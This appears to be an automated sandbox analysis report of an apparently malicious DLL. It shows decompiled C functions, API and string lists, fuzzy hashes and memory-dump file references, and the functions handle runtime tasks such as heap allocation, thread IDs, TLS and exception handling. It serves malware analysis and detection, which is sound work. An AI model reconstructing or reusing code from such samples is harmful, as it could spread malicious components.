String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 04fffbc1d033fe2e61c404af08718425c73055bcc9282246092e5a03e02ff660
Instruction ID: 8d9f0a2314a07edade5d88b526b4305e641b4e11bd5471b60d4e79f2496db6d7
Opcode Fuzzy Hash: 04fffbc1d033fe2e61c404af08718425c73055bcc9282246092e5a03e02ff660
Instruction Fuzzy Hash: 6B71C0B0A08305DFD7248FA4D85076ABBE5AB8634CF10C83DE5E68B384D732D94D8B12

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ED1C4D0(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6ED23990;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6ed6e108, __esi, __edi, __ebx);
				_t47 =  *0x6ed6d038; // 0x1
				_t50 =  *0x6ed6d03c; // 0x0
				_v40 = 0x6ed6e108;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6ed6e108);
					_v20 = 0;
					_t22 = E6ED399A0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6ed5fa80);
					goto L10;
				} else {
					 *0x6ed6d038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6ed6d03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6ED394E0(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6ed5fa90);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6ED1C6B0(_t22,  &_v40);
						}
						return E6ED1C690( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6ed6e108);
						_t29 =  *0x6ed6e128; // 0x810000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6ED392F0(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6ed6e128 = _t29;
								goto L5;
							}
						}
					}
				}
			}

0x6ed1c4d0
0x6ed1c4d9
0x6ed1c4dc
0x6ed1c4e3
0x6ed1c4f4
0x6ed1c4f7
0x6ed1c4fd
0x6ed1c509
0x6ed1c50f
0x6ed1c515
0x6ed1c51b
0x6ed1c524
0x6ed1c529
0x6ed1c5bf
0x6ed1c5bf
0x6ed1c5c7
0x6ed1c5cd
0x6ed1c5e3
0x00000000
0x6ed1c52f
0x6ed1c536
0x6ed1c53d
0x6ed1c542
0x6ed1c548
0x6ed1c5ed
0x6ed1c5f0
0x6ed1c606
0x6ed1c60e
0x6ed1c60e
0x6ed1c617
0x6ed1c61b
0x6ed1c620
0x6ed1c620
0x6ed1c631
0x6ed1c54e
0x6ed1c553
0x6ed1c559
0x6ed1c560
0x6ed1c570
0x6ed1c575
0x6ed1c57c
0x00000000
0x6ed1c57e
0x6ed1c57e
0x6ed1c581
0x6ed1c584
0x6ed1c58b
0x6ed1c58f
0x6ed1c595
0x6ed1c59f
0x6ed1c5ad
0x6ed1c5ad
0x6ed1c562
0x6ed1c562
0x6ed1c569
0x6ed1c5ae
0x6ed1c5b3
0x6ed1c5b8
0x6ed1c5bd
0x00000000
0x6ed1c56b
0x6ed1c56b
0x00000000
0x6ed1c56b
0x6ed1c569
0x6ed1c560
0x6ed1c548

APIs

AcquireSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C509
ReleaseSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C553
GetProcessHeap.KERNEL32 ref: 6ED1C562
HeapAlloc.KERNEL32(00810000,00000000,00000020), ref: 6ED1C575
ReleaseSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C5C7

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6ED1C5F7
failed to generate unique thread ID: bitspace exhausted, xrefs: 6ED1C5D4

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 1ea64568af13834d028b428a210c61af3b89e58de9eeb8aaba214af3d39f8b3b
Instruction ID: 6a8b239c4aaf54948a3340d6fc12c252486e44645948f5952edb63ad0f49543f
Opcode Fuzzy Hash: 1ea64568af13834d028b428a210c61af3b89e58de9eeb8aaba214af3d39f8b3b
Instruction Fuzzy Hash: 7E31D0B0E046058FEB14DFE4DC187AD7BB4EB89368F204129D815AF3D0D7799905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED110A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ED110A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6ED23950;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6ed6e128; // 0x810000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6ed5da37]");
						asm("movsd xmm1, [0x6ed5da30]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6ed6e128; // 0x810000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6ed5da47]");
								asm("movsd xmm1, [0x6ed5da3f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6ED39300(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6ED39280( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6ED2D4D0(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6ED2BE30(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6ed6e128, 0, _v36);
								}
								HeapFree( *0x6ed6e128, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6ed6e128 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6ED392F0(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6ED11000(_v52, _v48);
						return E6ED11000(_v40, 0xf);
					} else {
						 *0x6ed6e128 = _t45;
						goto L3;
					}
				}
				L21:
			}

0x6ed110a0
0x6ed110a0
0x6ed110a0
0x6ed110a3
0x6ed110a4
0x6ed110a5
0x6ed110a6
0x6ed110a9
0x6ed110ac
0x6ed110b3
0x6ed110c4
0x6ed110c7
0x6ed110cd
0x6ed110d4
0x6ed110e8
0x6ed110ed
0x6ed110f4
0x00000000
0x6ed110fa
0x6ed110fa
0x6ed11102
0x6ed1110a
0x6ed1110d
0x6ed11112
0x6ed11116
0x6ed1111d
0x6ed11131
0x6ed11136
0x6ed1113d
0x00000000
0x6ed11143
0x6ed11143
0x6ed1114b
0x6ed11153
0x6ed11155
0x6ed1115a
0x6ed1115d
0x6ed11164
0x6ed11169
0x6ed11192
0x6ed11195
0x6ed11198
0x00000000
0x00000000
0x6ed1119a
0x6ed1119a
0x6ed111a0
0x6ed111a2
0x6ed11235
0x6ed1123c
0x6ed11241
0x00000000
0x6ed111a8
0x6ed111ab
0x6ed111ad
0x6ed111b5
0x6ed111b8
0x6ed111bb
0x6ed111c2
0x6ed111c5
0x6ed111ca
0x6ed111cd
0x6ed111d0
0x6ed111d3
0x6ed111d6
0x6ed111d6
0x6ed11171
0x6ed11175
0x6ed1117e
0x6ed11180
0x6ed11185
0x6ed11188
0x6ed1118a
0x6ed1118d
0x6ed11191
0x00000000
0x6ed11191
0x00000000
0x6ed111a2
0x6ed111db
0x6ed111e5
0x6ed111f2
0x6ed111fa
0x6ed111fe
0x6ed1120b
0x6ed1120b
0x6ed1121b
0x6ed11220
0x6ed11223
0x6ed11230
0x6ed11230
0x6ed1111f
0x6ed1111f
0x6ed11126
0x6ed1124a
0x6ed1124a
0x00000000
0x6ed1112c
0x6ed1112c
0x00000000
0x6ed1112c
0x6ed11126
0x6ed1111d
0x6ed110d6
0x6ed110d6
0x6ed110dd
0x6ed11243
0x6ed11243
0x6ed1124f
0x6ed11254
0x6ed11259
0x6ed11264
0x6ed1126d
0x6ed11283
0x6ed110e3
0x6ed110e3
0x00000000
0x6ed110e3
0x6ed110dd
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6ED110D6
HeapAlloc.KERNEL32(00810000,00000000,0000000F), ref: 6ED110ED
GetProcessHeap.KERNEL32(00810000,00000000,0000000F), ref: 6ED1111F
HeapAlloc.KERNEL32(00810000,00000000,00000010,00810000,00000000,0000000F), ref: 6ED11136
HeapFree.KERNEL32(00000000,?,00000000,00000010,00810000,00000000,0000000F), ref: 6ED1120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,00810000,00000000,0000000F), ref: 6ED1121B

Strings

Control_RunDLL, xrefs: 6ED1114B
Control_RunDLL, xrefs: 6ED11102

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: d7ea81999a4f8a7d1c8b4b27d909c5d1083514ca60e4d4b19617a02372e15190
Instruction ID: 804945610a787534d1d217ae70693b0c7c0aceb4e41bfabf2d43f3c872539f34
Opcode Fuzzy Hash: d7ea81999a4f8a7d1c8b4b27d909c5d1083514ca60e4d4b19617a02372e15190
Instruction Fuzzy Hash: A851BB75D04619DFEB00CFE8DC80BEEB7B9FF99344F104629E9056B281D774A9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2EF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ED2EF20(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E6ED39200(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x6ed6d804;
				E6ED2EEE0(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x6ed6d804);
				E6ED3021C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E6ED303A0(_t80, 0xfffffffe, _t103, 0x6ed6d804);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E6ED30340(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E6ED2EEE0(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x6ed65704;
											if(__eflags != 0) {
												_t75 = E6ED39060(__eflags, 0x6ed65704);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x6ed65704; // 0x6ed2f131
													 *0x6ed3a154(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E6ED30380(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E6ED303A0(_t68, _t100, _t103, 0x6ed6d804);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E6ED2EEE0(_t80, _t95, _t100, _t103, _v12);
										E6ED30360();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x6ed2ef20
0x6ed2ef27
0x6ed2ef2b
0x6ed2ef2c
0x6ed2ef32
0x6ed2ef3e
0x6ed2ef40
0x6ed2ef46
0x6ed2ef46
0x6ed2ef4f
0x6ed2ef51
0x6ed2ef54
0x6ed2ef57
0x6ed2ef5f
0x6ed2ef64
0x6ed2ef67
0x6ed2ef6a
0x6ed2ef71
0x6ed2efcd
0x6ed2efd0
0x6ed2efd8
0x6ed2efdf
0x00000000
0x6ed2efdf
0x00000000
0x6ed2ef73
0x6ed2ef73
0x6ed2ef79
0x6ed2ef7f
0x6ed2ef85
0x6ed2eff0
0x6ed2eff9
0x6ed2ef87
0x6ed2ef87
0x6ed2ef87
0x6ed2ef8d
0x6ed2ef90
0x6ed2ef93
0x6ed2ef96
0x6ed2ef99
0x6ed2ef9e
0x6ed2efb4
0x00000000
0x6ed2efa0
0x6ed2efa0
0x6ed2efa2
0x6ed2efa7
0x6ed2efa9
0x6ed2efac
0x6ed2efae
0x6ed2efc4
0x6ed2efe4
0x6ed2efe4
0x6ed2efe8
0x00000000
0x6ed2efb0
0x6ed2efb0
0x6ed2effa
0x6ed2effd
0x6ed2f003
0x6ed2f005
0x6ed2f00c
0x6ed2f013
0x6ed2f018
0x6ed2f01b
0x6ed2f01d
0x6ed2f01f
0x6ed2f02c
0x6ed2f032
0x6ed2f034
0x6ed2f037
0x6ed2f037
0x6ed2f03a
0x6ed2f03a
0x6ed2f00c
0x6ed2f040
0x6ed2f042
0x6ed2f047
0x6ed2f04a
0x6ed2f04d
0x6ed2f055
0x6ed2f059
0x6ed2f05e
0x6ed2f05e
0x6ed2f061
0x6ed2f065
0x6ed2f068
0x6ed2f078
0x6ed2f07d
0x6ed2f081
0x6ed2f084
0x6ed2f087
0x6ed2f089
0x6ed2f08f
0x6ed2f092
0x6ed2f092
0x6ed2f095
0x6ed2f095
0x6ed2f097
0x6ed2f099
0x00000000
0x00000000
0x6ed2f09b
0x6ed2f09d
0x00000000
0x6ed2f09f
0x6ed2f09f
0x6ed2f0a2
0x6ed2f0a5
0x00000000
0x6ed2f0a7
0x6ed2f0a7
0x6ed2f0aa
0x6ed2f0ad
0x6ed2f0af
0x00000000
0x6ed2f0b1
0x00000000
0x6ed2f0b1
0x6ed2f0af
0x6ed2f0a5
0x00000000
0x6ed2f09d
0x6ed2f0b3
0x6ed2f0b5
0x6ed2f0b5
0x6ed2f0b9
0x6ed2f08b
0x6ed2f08b
0x6ed2f08b
0x6ed2f08e
0x6ed2f08e
0x6ed2efb2
0x00000000
0x6ed2efb2
0x6ed2efb0
0x6ed2efae
0x00000000
0x6ed2efb7
0x6ed2efb7
0x6ed2efb9
0x6ed2efc0
0x00000000
0x6ed2efc2
0x00000000
0x6ed2efc0
0x6ed2ef85
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6ED2EF57
___except_validate_context_record.LIBVCRUNTIME ref: 6ED2EF5F
_ValidateLocalCookies.LIBCMT ref: 6ED2EFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6ED2F013
_ValidateLocalCookies.LIBCMT ref: 6ED2F068

Strings

csm, xrefs: 6ED2EFFD

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 31601eba9cb3d03d09ded69d9a0c1d9ffc197fa25c20172f321745e94b3efac1
Instruction ID: 6d97f8ffecafb4b49129f2d1407de4a7a2c321f00d0f07513c7fa9b3e7cbbab3
Opcode Fuzzy Hash: 31601eba9cb3d03d09ded69d9a0c1d9ffc197fa25c20172f321745e94b3efac1
Instruction Fuzzy Hash: 0E418034A10219DFCF01DFA8C884ADEBBB5AF4632CF248565EE249B391D731D905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED22960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6ED22960(void* __ebx, long* __ecx, void* __edi, void* __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				long _v76;
				intOrPtr _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				intOrPtr _v104;
				char _v108;
				void* __ebp;
				long _t41;
				void* _t47;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void _t56;
				void* _t65;
				long _t70;
				long* _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t87;

				_t78 = _t77 - 0x5c;
				_v32 = _t78;
				_v20 = 0xffffffff;
				_v24 = E6ED23A60;
				_t73 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				__imp__AcquireSRWLockExclusive(0x6ed6e114, __esi, __edi, __ebx);
				_v36 = 0x6ed6e114;
				_t70 =  *__ecx;
				if(_t70 != 0) {
					L10:
					__imp__ReleaseSRWLockExclusive(_v36);
					 *[fs:0x0] = _v28;
					return _t70;
				} else {
					_t7 =  &(_t73[1]); // 0x6ed22f50
					_t56 =  *_t7;
					_t41 = TlsAlloc();
					if(_t41 == 0xffffffff) {
						_v20 = 0;
						E6ED394E0(_t56, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx", 0x2e, _t70, _t73, __eflags, 0x6ed6061c);
						_t78 = _t78 + 4;
						asm("ud2");
						goto L12;
					} else {
						_t70 = _t41;
						if(_t56 == 0) {
							L9:
							 *_t73 = _t70;
							if(_t70 == 0) {
								L12:
								_v108 = 0x6ed5ff5c;
								_v104 = 1;
								_v100 = 0;
								_v92 = 0x6ed5f570;
								_v84 = 0x6ed5fdb4;
								_v80 = 2;
								_v40 = 0;
								_v44 = 0;
								_v88 = 0;
								_v76 = 0;
								_v20 = 0;
								_v60 =  &_v108;
								_v56 = E6ED12110;
								_v68 =  &_v60;
								_v64 = 1;
								_v52 = E6ED1D0F0( &_v44, __eflags);
								_v48 =  &_v84;
								E6ED1D2B0( &_v52);
								asm("int 0x29");
								asm("ud2");
								goto L13;
							} else {
								goto L10;
							}
						} else {
							_t51 =  *0x6ed6e128; // 0x810000
							if(_t51 != 0) {
								L6:
								_t52 = HeapAlloc(_t51, 0, 0xc);
								_t87 = _t52;
								if(_t87 == 0) {
									goto L13;
								} else {
									 *_t52 = _t56;
									 *(_t52 + 4) = _t70;
									 *(_t52 + 8) = 0;
									_t65 = _t52;
									_t53 =  *0x6ed6e12c; // 0x0
									do {
										 *((intOrPtr*)(_t65 + 8)) = _t53;
										asm("lock cmpxchg [0x6ed6e12c], ecx");
									} while (_t87 != 0);
									goto L9;
								}
							} else {
								_t51 = GetProcessHeap();
								if(_t51 == 0) {
									L13:
									_t47 = E6ED392F0(_t56, 0xc, 4, _t70, _t73, __eflags);
									asm("ud2");
									__eflags =  &_a8;
									return E6ED1C6B0(_t47,  &_v36);
								} else {
									 *0x6ed6e128 = _t51;
									goto L6;
								}
							}
						}
					}
				}
			}

0x6ed22966
0x6ed22969
0x6ed2296c
0x6ed22973
0x6ed2297a
0x6ed22986
0x6ed22989
0x6ed22994
0x6ed2299a
0x6ed229a1
0x6ed229a5
0x6ed22a15
0x6ed22a18
0x6ed22a21
0x6ed22a30
0x6ed229a7
0x6ed229a7
0x6ed229a7
0x6ed229aa
0x6ed229b3
0x6ed22a31
0x6ed22a47
0x6ed22a4c
0x6ed22a4f
0x00000000
0x6ed229b5
0x6ed229b5
0x6ed229b9
0x6ed22a0d
0x6ed22a11
0x6ed22a13
0x6ed22a51
0x6ed22a5a
0x6ed22a61
0x6ed22a68
0x6ed22a6f
0x6ed22a76
0x6ed22a7d
0x6ed22a84
0x6ed22a88
0x6ed22a8f
0x6ed22a96
0x6ed22a9d
0x6ed22aa4
0x6ed22aaa
0x6ed22ab1
0x6ed22ab4
0x6ed22ac3
0x6ed22ac6
0x6ed22ac9
0x6ed22ad3
0x6ed22ad5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed229bb
0x6ed229bb
0x6ed229c2
0x6ed229d6
0x6ed229db
0x6ed229e0
0x6ed229e2
0x00000000
0x6ed229e8
0x6ed229e8
0x6ed229ea
0x6ed229ed
0x6ed229f4
0x6ed229f6
0x6ed22a00
0x6ed22a00
0x6ed22a03
0x6ed22a03
0x00000000
0x6ed22a00
0x6ed229c4
0x6ed229c4
0x6ed229cb
0x6ed22ad7
0x6ed22ae1
0x6ed22ae6
0x6ed22af4
0x6ed22b03
0x6ed229d1
0x6ed229d1
0x00000000
0x6ed229d1
0x6ed229cb
0x6ed229c2
0x6ed229b9
0x6ed229b3

APIs

AcquireSRWLockExclusive.KERNEL32(6ED6E114), ref: 6ED22994
TlsAlloc.KERNEL32 ref: 6ED229AA
GetProcessHeap.KERNEL32 ref: 6ED229C4
HeapAlloc.KERNEL32(00810000,00000000,0000000C), ref: 6ED229DB
ReleaseSRWLockExclusive.KERNEL32(6ED6E114), ref: 6ED22A18

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6ED22A38

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
